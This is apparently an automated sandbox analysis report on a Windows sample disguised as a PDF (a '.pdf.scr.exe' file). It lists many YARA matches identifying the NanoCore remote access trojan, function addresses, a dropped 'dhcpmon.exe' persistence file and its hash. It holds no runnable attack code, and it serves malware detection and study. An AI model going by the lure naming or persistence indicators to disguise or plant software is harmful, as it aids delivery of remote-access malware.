      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC848E0_2_00CC848E
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD6CDC0_2_00CD6CDC
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC40FE0_2_00CC40FE
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD40880_2_00CD4088
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD00B70_2_00CD00B7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE51C90_2_00CE51C9
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD71530_2_00CD7153
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD62CA0_2_00CD62CA
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC32F70_2_00CC32F7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD43BF0_2_00CD43BF
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CED4400_2_00CED440
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCF4610_2_00CCF461
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCC4260_2_00CCC426
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD77EF0_2_00CD77EF
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CED8EE0_2_00CED8EE
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CC286B0_2_00CC286B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CF19F40_2_00CF19F4
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCE9B70_2_00CCE9B7
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CD3E0B0_2_00CD3E0B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCEFE20_2_00CCEFE2
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE4F9A0_2_00CE4F9A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003380372_2_00338037
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003320072_2_00332007
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032E0BE2_2_0032E0BE
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0031E1A02_2_0031E1A0
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0031225D2_2_0031225D
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034A28E2_2_0034A28E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003322C22_2_003322C2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032C59E2_2_0032C59E
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0039C7A32_2_0039C7A3
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034E89F2_2_0034E89F
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038291A2_2_0038291A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00346AFB2_2_00346AFB
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00378B272_2_00378B27
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0033CE302_2_0033CE30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003471692_2_00347169
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A51D22_2_003A51D2
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003192402_2_00319240
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003194992_2_00319499
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003317242_2_00331724
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00331A962_2_00331A96
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00319B602_2_00319B60
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00337BAB2_2_00337BAB
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00331D402_2_00331D40
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00337DDA2_2_00337DDA
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00371A91
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeSection loaded: dxgidebug.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
      Source: 026910003102350.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
